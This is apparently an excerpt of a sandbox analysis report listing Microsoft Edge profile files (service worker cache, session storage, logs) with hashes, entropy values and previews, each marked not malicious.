                                                                                                                                                                                                                                                                                          MD5:14830D0ED1A3DED9AF2569AECBA66857
                                                                                                                                                                                                                                                                                          SHA1:9480B6067281BD1B66EAEA6467595665023AAF73
                                                                                                                                                                                                                                                                                          SHA-256:E7E850193F3C23CCFB7092BD185B677990800957E56A2D7EBAEE16F67982AD57
                                                                                                                                                                                                                                                                                          SHA-512:2D2C8D34B844C240B007685AEC1964600D701A0112CFB4F84F0B81FC422F42603673B9F4C3093B6F1DD5177502E56EE9B222FB0B14A843D4738E269093A5D92A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2...................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):293
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1967691302847605
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bMJDM1qLTwi23oH+TcwtE/a252KLlrbMJAVq2PqLTwi23oH+TcwtE/a2ZIFUv:yZlwZYeb8xL6uVv8wZYeb8J2FUv
                                                                                                                                                                                                                                                                                          MD5:8C19618BB71D7F92E0B20945D649EE32
                                                                                                                                                                                                                                                                                          SHA1:9668C26D6CB4F7125C81C08D48767168459B29FC
                                                                                                                                                                                                                                                                                          SHA-256:1E83ACD12A812CD8A5954B6211B3165E955A195891887B19C79B6F162CEA8C25
                                                                                                                                                                                                                                                                                          SHA-512:B8092963EFA2CCBC29D250D183FA1E7CE610274D4EDB24E5C9B7ED325E43E56C8691FDE21229160D23CBFDDAE2D41D3E5D8F2705C2EB7C8A42AF082D0E35A208
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:38.841 d84 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/30-09:55:38.866 d84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):114579
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.580007577642466
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekK5ABjH:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dHD
                                                                                                                                                                                                                                                                                          MD5:E20860A8FC0B55D6291EB8A1AE97F8DE
                                                                                                                                                                                                                                                                                          SHA1:A66E6CA0C3577A8ECEFD89C824C4B08239D318BA
                                                                                                                                                                                                                                                                                          SHA-256:A6DB08C9C817450B1C8CCC473A943521FD5C608E0FD4FA3041DAA7F18F7BA47B
                                                                                                                                                                                                                                                                                          SHA-512:5BB86479D22EF9259EA2723B205E67E2D7885A5436E071B4C56804A86E301F596DA48208A18A647B58ACC04F395574989F2FAD2D2CA7A6B7451DECBEEFACE214
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):189121
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.3875123249195465
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:fwcl4AKeF1wmwI3M+46L/unTFsnvSbF9GWOIKfEFY0vUP2L+:h1wmtM8L/0xP5MFon+
                                                                                                                                                                                                                                                                                          MD5:BD89A76A7F2C7B3AC7D9090C46CB33FA
                                                                                                                                                                                                                                                                                          SHA1:095CE56BEA4FE72A7C9D9449A5F2C9EE1DFA9F50
                                                                                                                                                                                                                                                                                          SHA-256:9C53F9B1768F170B62B8AE2CBDC48047286EB6EB31FC6B2FD64BF4A142B92FAA
                                                                                                                                                                                                                                                                                          SHA-512:652B8215D33017A0BDC5ABE9B49C373953DEA90271DF67F69726769FFACD099F7D8B3F3379FCB9527A17F7EF65DBDF0C05405CB0263651B56C629E125ABDF956
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0....z3.................;.....x.h........,T.8..`,.....L`.....,T...`......L`......Rc~4......exports...Rc........module....RcRm......define....Rb20......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.....K^{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....@[...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                          MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                          SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                          SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                          SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:0\r..m..................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5654124237607285
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:CVlXTXl/lYV/lxEstllQvuJl:C7XjYWs+Wr
                                                                                                                                                                                                                                                                                          MD5:E5BE18B618309B143281B204DF3CCEB4
                                                                                                                                                                                                                                                                                          SHA1:BD6BE605A4C367E0E2B606ADB5EDED092C03F338
                                                                                                                                                                                                                                                                                          SHA-256:A79503836F3FC7AC51F8C9A5690AC7A19CC7FD07BDA056E75AF8B38B75ECBBA6
                                                                                                                                                                                                                                                                                          SHA-512:B86F41356102C9CC87B4A9DD9507DE3018DCFDDABBF50DD2DE1668503730BFCD624505FB4B38EE42ECB6A2E066BAF63931113BD876E74FF9A2881DF78CDF3E8A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@.....~.oy retne.........................X....,................8..J../.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5654124237607285
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:CVlXTXl/lYV/lxEstllQvuJl:C7XjYWs+Wr
                                                                                                                                                                                                                                                                                          MD5:E5BE18B618309B143281B204DF3CCEB4
                                                                                                                                                                                                                                                                                          SHA1:BD6BE605A4C367E0E2B606ADB5EDED092C03F338
                                                                                                                                                                                                                                                                                          SHA-256:A79503836F3FC7AC51F8C9A5690AC7A19CC7FD07BDA056E75AF8B38B75ECBBA6
                                                                                                                                                                                                                                                                                          SHA-512:B86F41356102C9CC87B4A9DD9507DE3018DCFDDABBF50DD2DE1668503730BFCD624505FB4B38EE42ECB6A2E066BAF63931113BD876E74FF9A2881DF78CDF3E8A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@.....~.oy retne.........................X....,................8..J../.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF30178.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5654124237607285
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:CVlXTXl/lYV/lxEstllQvuJl:C7XjYWs+Wr
                                                                                                                                                                                                                                                                                          MD5:E5BE18B618309B143281B204DF3CCEB4
                                                                                                                                                                                                                                                                                          SHA1:BD6BE605A4C367E0E2B606ADB5EDED092C03F338
                                                                                                                                                                                                                                                                                          SHA-256:A79503836F3FC7AC51F8C9A5690AC7A19CC7FD07BDA056E75AF8B38B75ECBBA6
                                                                                                                                                                                                                                                                                          SHA-512:B86F41356102C9CC87B4A9DD9507DE3018DCFDDABBF50DD2DE1668503730BFCD624505FB4B38EE42ECB6A2E066BAF63931113BD876E74FF9A2881DF78CDF3E8A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:@.....~.oy retne.........................X....,................8..J../.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4883
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.42997734527802
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:P9LFKqDhumIj6cDA9Xp+J+VihxLl9iSrK1fhcskcWPvC:pFHdIjA9Xp+JKiXLl9iSrKth+y
                                                                                                                                                                                                                                                                                          MD5:137796C0EA9834E617209482D7342010
                                                                                                                                                                                                                                                                                          SHA1:40F602B73D77A8A45B3A79BDE6BFE75CB0292925
                                                                                                                                                                                                                                                                                          SHA-256:0B6AF97502BA596B2657F3B88EBF9F1DAEE95623F30135C3C87B16E491879939
                                                                                                                                                                                                                                                                                          SHA-512:A7E49F2B9BE66327AC4FADDBAA2E9891DA1B1DE2186F130AEDC82F3E2D1DF9099BB8CB23E0AAE73A49422D96BD8DCF271A3DA8A1AA6690791ED0FD41483BF8C7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................Pb................next-map-id.1.Cnamespace-a59583d9_f808_4fd5_9d80_563a04416308-https://ntp.msn.com/.0...?.................map-0-shd_sweeper.#{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.n.p.w.x.e.x.p.i.r.e.-.c.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.f.-.r.e.l.-.a.l.l.,.1.s.-.f.c.r.y.p.t.,.p.r.g.-.w.p.o.-.p.n.p.c.,.1.s.-.n.t.f.2.-.e.v.l.c.f.c.,.1.s.-.n.t.f.2.-.b.k.n.l.c.,.1.s.-.n.t.f.2.-.i.p.t.l.c.,.1.s.-.p.r.2.-.e.v.l.c.,.1.s.-.p.r.2.-.e.v.l.c.b.b.,.1.s.-.p.r.2.-.e.v.l.c.h.,.1.s.-.p.r.2.-.e.v.l.c.n.,.1.s.-.p.r.2.-.e.v.l.c.r.p.,.1.s.-.p.r.2.-.e.v.l.c.t.,.1.s.-.p.r.g.2.-.l.i.f.e.c.y.c.l.e.,.1.s.-.w.p.o.-.p.r.2.-.n.c.a.r.d.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):320
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1837136566320225
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bUoq2PqLTwi23oH+TcwtrQMxIFUt8MbUgF7Zmw+MbURFkwOqLTwi23oH+Tcwtrb:iov8wZYebCFUt8HgF7/+HRF5TwZYebtJ
                                                                                                                                                                                                                                                                                          MD5:7462AED30A2CAC7651C4C32FCECAC657
                                                                                                                                                                                                                                                                                          SHA1:486B13DEC568EB085CE48538C0EFCD9BDF97FCB2
                                                                                                                                                                                                                                                                                          SHA-256:7ECE0A8C5197A62A1E9A14B4E6C02B511431C83D6FFE91806D5BBA20AFB08585
                                                                                                                                                                                                                                                                                          SHA-512:5AAEC95CA94B667F2491E63CF5EA833F24396D0030BB7F6345D31E3CDCE492C21AF808F2C3093868D3EECF5E9F2D60E057573DDA8F5760AEB1E2CB3A1D84FBF7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.875 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/30-09:55:29.876 1f70 Recovering log #3.2024/12/30-09:55:29.879 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):320
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1837136566320225
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bUoq2PqLTwi23oH+TcwtrQMxIFUt8MbUgF7Zmw+MbURFkwOqLTwi23oH+Tcwtrb:iov8wZYebCFUt8HgF7/+HRF5TwZYebtJ
                                                                                                                                                                                                                                                                                          MD5:7462AED30A2CAC7651C4C32FCECAC657
                                                                                                                                                                                                                                                                                          SHA1:486B13DEC568EB085CE48538C0EFCD9BDF97FCB2
                                                                                                                                                                                                                                                                                          SHA-256:7ECE0A8C5197A62A1E9A14B4E6C02B511431C83D6FFE91806D5BBA20AFB08585
                                                                                                                                                                                                                                                                                          SHA-512:5AAEC95CA94B667F2491E63CF5EA833F24396D0030BB7F6345D31E3CDCE492C21AF808F2C3093868D3EECF5E9F2D60E057573DDA8F5760AEB1E2CB3A1D84FBF7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.875 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/30-09:55:29.876 1f70 Recovering log #3.2024/12/30-09:55:29.879 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13380044131592668

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8202116130972854
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:35KY3ZpsAF4unxutLp3X2amEtG1ChqSply2XQKkOAM4N55:30GzFQLp2FEkChZplbAHOpe
                                                                                                                                                                                                                                                                                          MD5:246D052BE06A444218DA69E858362E06
                                                                                                                                                                                                                                                                                          SHA1:0DCDC7B68B8AB3305E18628C855D209C25742828
                                                                                                                                                                                                                                                                                          SHA-256:F2E25F976DD9D1C7C5D6CEEFC53871CD3A6C0C1678A9AF23F40D2EC9CCDD2807
                                                                                                                                                                                                                                                                                          SHA-512:4388B510C5701C1E317A6FA438A1B2D9F6CA1A7C8BB72E3E6023ECE951EFEB05A9F4A12C0B0E6364BE9693230EA9584329FC9453104A06231ED5AD12D183078E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SNSS..........j..............j......"...j..............j..........j..........j..........j....!.....j..................................j...j1..,......j$...a59583d9_f808_4fd5_9d80_563a04416308......j..........j..................j......j..........................j....................5..0......j&...{3A9A5720-BFF5-4C6E-B4C6-310A980401CC}........j..........j..............j........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......7s..~*..8s..~*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... ..................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):345
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1379891389570735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5b7N+q2PqLTwi23oH+Tcwt7Uh2ghZIFUt8Mb52WZmw+Mb59VkwOqLTwi23oH+Tcz:7+v8wZYebIhHh2FUt8dW/+QV5TwZYebs
                                                                                                                                                                                                                                                                                          MD5:68596A74543944586D6A5951A1F57C29
                                                                                                                                                                                                                                                                                          SHA1:ECC12993E83A4F8070D4EB7F3C6FF34E83D1DAE0
                                                                                                                                                                                                                                                                                          SHA-256:8BCB33B28FC90A6D51051CDDD97106F48EF2EA3FCE72D24231B071974BD0CB65
                                                                                                                                                                                                                                                                                          SHA-512:D5B787CA9BD7727AC37EF12884C022CDCB477CF7E05D9C7218200C2BAB87506E85C17B07AEEF7D0AA70ED6CA5E98CEA7638978AB181BD89B4CDC686998B790A8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.126 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/30-09:55:29.128 8ec Recovering log #3.2024/12/30-09:55:29.128 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):345
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1379891389570735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5b7N+q2PqLTwi23oH+Tcwt7Uh2ghZIFUt8Mb52WZmw+Mb59VkwOqLTwi23oH+Tcz:7+v8wZYebIhHh2FUt8dW/+QV5TwZYebs
                                                                                                                                                                                                                                                                                          MD5:68596A74543944586D6A5951A1F57C29
